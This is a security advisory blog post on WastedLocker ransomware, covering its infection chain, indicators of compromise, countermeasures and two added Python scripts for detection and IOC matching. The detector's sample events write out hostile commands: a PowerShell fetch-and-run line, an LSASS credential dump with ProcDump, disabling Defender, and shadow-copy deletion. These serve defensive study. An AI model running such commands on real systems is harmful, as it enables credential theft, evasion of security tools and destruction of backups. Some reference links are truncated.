Virus Alert 

WastedLocker Ransomware

It has been reported that a new ransomware family named "WastedLocker" is
spreading. The attacks mainly target organizations located in the U.S. across
various industries, including manufacturing, media, IT and healthcare. The
attacks are attributed to the cybercriminal group "Evil Corp", which has
previously been linked to other major cyber-attacks.

Infection Mechanism:

The infection chain starts with a malicious JavaScript-based framework known
as "SocGholish", delivered to the victim in a zipped file while visiting a
compromised legitimate website; at least 150 compromised websites have been
reported. The zip file contains malicious JavaScript masquerading as a browser
update. A second JavaScript profiles the computer using commands such as
whoami, net user and net group, and PowerShell is used to download additional
scripts.

The next pivotal stage of the attack is to download and execute a loader from
a domain used to deliver the Cobalt Strike threat emulation software. The
loader also contains a .NET injector. The injected payload, the Cobalt Strike
Beacon, can inject into other processes and, together with several other
tools, is used to steal credentials, escalate privileges and move laterally
across the network. The attackers also enumerate all computer objects in the
Active Directory database to locate Windows servers and hosts, and Cobalt
Strike is used to dump credentials with "ProcDump".

Before deploying the ransomware, the attackers disable Windows Defender across
the victim's entire network using PowerShell scripts and legitimate tools.
Once all payloads are in place, Windows Defender is disabled and services
across the organization have been stopped, the Windows Sysinternals tool
"PsExec" is used to launch the WastedLocker ransomware itself. The ransomware
encrypts the victim's data and deletes the Windows Volume Shadow Copies,
wiping backups and file snapshots so that recovery from them is impossible.
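
The host-side stages described above, expressed as detection rules over process-creation telemetry. This is an added example written for this advisory, not code from the advisory or from any vendor product. The event fields (host, user, parent, image, cmdline) are an assumption modelled on Sysmon Event ID 1 / Windows Security event 4688, and the events are constructed, not real captures.

```python
"""Detection rules for the host-side stages of the WastedLocker chain.

Added illustration for this advisory; not code from the advisory or from any
vendor product. The event shape (host, user, parent, image, cmdline) is an
assumption modelled on Sysmon Event ID 1 / Windows Security event 4688.
"""
import re
from collections import defaultdict

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# The profiling commands the advisory names: whoami, net user, net group.
RECON_RE = re.compile(r"\b(whoami|net\s+users?|net\s+group)\b", re.I)


def _from_script_host(e):
    return e["parent"].lower() in SCRIPT_HOSTS


def _has(pattern, text):
    return re.search(pattern, text, re.I) is not None


# (rule name, predicate over one event). Each maps to a stage described above:
# script-host recon, PowerShell download, ProcDump against LSASS, Defender
# tampering, the PsExec service, shadow-copy deletion.
RULES = [
    ("script_host_recon",
     lambda e: _from_script_host(e) and RECON_RE.search(e["cmdline"]) is not None),
    ("script_host_powershell_download",
     lambda e: _from_script_host(e) and e["image"].lower() == "powershell.exe"
     and _has(r"downloadstring|downloadfile|invoke-webrequest", e["cmdline"])),
    ("lsass_dump_procdump",
     lambda e: "procdump" in e["image"].lower() and _has(r"\blsass\b", e["cmdline"])),
    ("defender_disabled",
     lambda e: _has(r"set-mppreference.*-disable\w+\s+\$?true", e["cmdline"])),
    ("psexec_service",
     lambda e: e["image"].lower() == "psexesvc.exe"),
    ("shadow_copy_deletion",
     lambda e: (e["image"].lower() == "vssadmin.exe" and _has(r"delete\s+shadows", e["cmdline"]))
     or (e["image"].lower() == "wmic.exe" and _has(r"shadowcopy\s+delete", e["cmdline"]))),
]


def detect(events):
    """Return {host: sorted names of the rules that fired on that host}."""
    hits = defaultdict(set)
    for e in events:
        for name, pred in RULES:
            if pred(e):
                hits[e["host"]].add(name)
    return {h: sorted(names) for h, names in hits.items()}


def recon_chain_hosts(events, min_distinct=2):
    """Hosts where a script host ran at least `min_distinct` different recon
    commands. One `whoami` from a script is noise; the whoami / net user /
    net group profiling sequence is not."""
    seen = defaultdict(set)
    for e in events:
        if _from_script_host(e):
            m = RECON_RE.search(e["cmdline"])
            if m:
                seen[e["host"]].add(re.sub(r"\s+", " ", m.group(1).lower()))
    return sorted(h for h, cmds in seen.items() if len(cmds) >= min_distinct)


# Constructed sample telemetry (not real captures): one event per stage plus
# a benign `net use` from Explorer that must not fire.
EVENTS = [
    {"host": "ws01", "user": "CORP\\jdoe", "parent": "wscript.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"host": "ws01", "user": "CORP\\jdoe", "parent": "wscript.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c net user"},
    {"host": "ws01", "user": "CORP\\jdoe", "parent": "wscript.exe", "image": "cmd.exe",
     "cmdline": 'cmd.exe /c net group "domain admins" /domain'},
    {"host": "ws01", "user": "CORP\\jdoe", "parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c IEX((New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/s'))"},
    {"host": "dc01", "user": "CORP\\svc_backup", "parent": "cmd.exe", "image": "procdump64.exe",
     "cmdline": "procdump64.exe -accepteula -ma lsass.exe C:\\Windows\\Temp\\l.dmp"},
    {"host": "srv02", "user": "CORP\\svc_backup", "parent": "powershell.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "srv02", "user": "NT AUTHORITY\\SYSTEM", "parent": "services.exe", "image": "PSEXESVC.exe",
     "cmdline": "C:\\Windows\\PSEXESVC.exe"},
    {"host": "srv02", "user": "NT AUTHORITY\\SYSTEM", "parent": "PSEXESVC.exe", "image": "vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "ws07", "user": "CORP\\asmith", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c net use Z: \\\\fs01\\share"},
]

if __name__ == "__main__":
    for host, names in detect(EVENTS).items():
        print(host, names)
    print("recon chain on:", recon_chain_hosts(EVENTS))
```

The single-event rules are deliberately narrow (parent is a script host, image is the tool named above) so that routine administrative use of net or PowerShell does not page anyone; the profiling sequence is only reported once several distinct recon commands come from the same script host.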

The threat actors behind this attack are highly experienced, and if the
intrusion on a victim's network goes unidentified and unaddressed it can
cause substantial damage.

IOC:

IP Address:
185.189.151.38
185.162.235.167
185.82.127.38
195.123.227.225
38.135.104.189
88.119.175.104
91.219.237.36
91.236.116.63

Domain:

sodality[d0t]mandmsolicitorscom
advokat-hodonin[d0t]info/gate[d0t]php
penaz[d0t]info/gate[d0t]php
lgrarcosbann[d0t]club/index[d0t]php
cofeedback[d0t]com
consultane[d0t]com
feedbackgive[d0t]com
msoftwares[d0t]info
mwebsoft[d0t]com
net-giftshop[d0t]info
rostraffic[d0t]com
traffichi[d0t]com
typiconsult[d0t]com
websitesbuilder[d0t]info
backup[d0t]awarfaregaming[d0t]com
click[d0t]clickanalytics208[d0t]com
connect[d0t]clevelandskin[d0t]com
connect[d0t]clevelandskin[d0t]net
connect[d0t]clevelandskin[d0t]org
cushion[d0t]aiimss[d0t]com
link[d0t]easycounter210[d0t]com
rocket2[d0t]new10k[d0t]com
track[d0t]positiverefreshment[d0t]org

Hashes:

Kindly visit the URL:

stedlocker-ransomware-us

Countermeasures and best practices for prevention:

Maintain appropriate firewall policies to block malicious traffic entering the system/network. Enable a personal firewall on workstations.
Keep antivirus/anti-malware software updated so that threats are detected before they infect the system/network. Always scan external drives/removable devices before use. Deploy anti-phishing solutions that help protect credentials and block malicious file downloads.
Keep web filtering tools updated.
Block the IP addresses of known malicious sites to prevent devices from being able to access them. Activate intelligent website blacklisting to block known bad websites.
Use limited-privilege user accounts on workstations, and grant administrative access to systems only through separate, dedicated administrative accounts.
Block websites hosting JavaScript miners at both the gateway and the endpoints.
Keep software and the OS up to date so that attackers cannot exploit known vulnerabilities.
Change default login credentials, as they are readily available to attackers.
Avoid downloading files from untrusted websites.
Go beyond intrusion detection: protect servers with runtime memory protection for critical applications and server workloads, to defend against actors who already have a foothold on the server.
Disable Autorun and Autoplay policies.
Consider using application whitelists to prevent unknown executables from launching.
Since the ransomware deletes the Volume Shadow Copies, keep offline or otherwise immutable backups that a domain-joined host cannot reach, and test restoring from them.
Remove the system changes made by the malware (files created, registry entries, services, etc.).
Monitor traffic from client machines to the domains and IP addresses listed in the IOC section above.
Disable unnecessary services on workstations and servers.
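
A way to act on the monitoring recommendation above: match outbound DNS and proxy records against the advisory's network IOCs. This is an added example written for this advisory, not code from the advisory or from any vendor. The indicators are a subset copied from the IOC section above in their defanged "[d0t]" form; the log format (timestamp, client IP, record kind, target) and the log lines are constructed for the example.

```python
"""Match outbound DNS/proxy log lines against the advisory's network IOCs.

Added illustration for this advisory; not code from the advisory or any
vendor. Indicators are a subset of the IOC section above, kept in the
advisory's defanged "[d0t]" form; the log format and lines are constructed.
"""
import ipaddress
import re
from urllib.parse import urlsplit

IOC_DOMAINS_DEFANGED = [
    "advokat-hodonin[d0t]info/gate[d0t]php",
    "penaz[d0t]info/gate[d0t]php",
    "lgrarcosbann[d0t]club/index[d0t]php",
    "cofeedback[d0t]com",
    "consultane[d0t]com",
    "backup[d0t]awarfaregaming[d0t]com",
    "connect[d0t]clevelandskin[d0t]org",
    "track[d0t]positiverefreshment[d0t]org",
]
IOC_IPS = ["185.189.151.38", "185.162.235.167", "91.236.116.63"]


def refang(s):
    """Turn defanged notation ([d0t], [dot], [.], hxxp) back into a usable
    string. Only refang inside tooling; never paste the result into a browser."""
    s = re.sub(r"\[(?:d0t|dot|\.)\]", ".", s, flags=re.I)
    return re.sub(r"hxxp", "http", s, flags=re.I)


def load_iocs(domains_defanged, ips):
    """Split each entry into a host plus an optional exact URL path."""
    hosts, urls = set(), set()
    for entry in domains_defanged:
        host, _, path = refang(entry).lower().partition("/")
        hosts.add(host)
        if path:
            urls.add((host, "/" + path))
    return {"hosts": hosts, "urls": urls,
            "ips": [ipaddress.ip_network(ip) for ip in ips]}


def host_matches(name, hosts):
    """Exact host or any subdomain of it; the longest listed host wins."""
    name = name.lower().rstrip(".")
    cands = [h for h in hosts if name == h or name.endswith("." + h)]
    return max(cands, key=len) if cands else None


def match_line(line, iocs):
    """Return (client, kind, indicator) for a hit, else None."""
    _ts, client, kind, target = line.split()
    if kind == "DNS":
        h = host_matches(target, iocs["hosts"])
        return (client, "domain", h) if h else None
    if kind == "CONNECT":
        ip = ipaddress.ip_address(target.rsplit(":", 1)[0])
        return (client, "ip", str(ip)) if any(ip in n for n in iocs["ips"]) else None
    if kind == "HTTP":
        u = urlsplit(target)
        h = host_matches(u.hostname or "", iocs["hosts"])
        if not h:
            return None
        if (h, u.path) in iocs["urls"]:
            return (client, "url", h + u.path)   # exact C2 gate hit
        return (client, "domain", h)             # same host, other path
    return None


def scan(lines, iocs):
    return [m for m in (match_line(l, iocs) for l in lines) if m]


IOCS = load_iocs(IOC_DOMAINS_DEFANGED, IOC_IPS)

# Constructed log lines (not real traffic). The last one carries an IOC string
# only in the URL path and must not match: matching is on the host, never on
# a substring of the whole line.
LOG_LINES = [
    "2020-06-24T10:01:02Z 10.0.0.15 DNS www.consultane.com",
    "2020-06-24T10:01:03Z 10.0.0.15 HTTP http://penaz.info/gate.php",
    "2020-06-24T10:01:09Z 10.0.0.15 HTTP http://penaz.info/favicon.ico",
    "2020-06-24T10:02:11Z 10.0.0.22 CONNECT 185.189.151.38:443",
    "2020-06-24T10:02:40Z 10.0.0.22 DNS connect.clevelandskin.org",
    "2020-06-24T10:03:00Z 10.0.0.31 DNS www.example.com",
    "2020-06-24T10:03:05Z 10.0.0.31 HTTP https://example.com/consultane.com",
]

if __name__ == "__main__":
    for hit in scan(LOG_LINES, IOCS):
        print(*hit)
```

Subdomain matching matters here because the advisory lists apex domains such as consultane[d0t]com while the observed traffic goes to arbitrary hostnames under them; the reverse (a listed subdomain such as connect[d0t]clevelandskin[d0t]org) does not flag its parent domain, which is the intended behaviour.
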

References:

stedlocker-ransomware-us
ed-in-wastedlocker-ransomware-attacks/
ant-developed-by-the-evil-corp-group/

About Cert Advisory

We have created this blog to provide the latest security advisories from the India CERT on security vulnerabilities, threats, attacks and the patching required to mitigate cyber attacks.

© Copyright 2020. Designed By Templateify
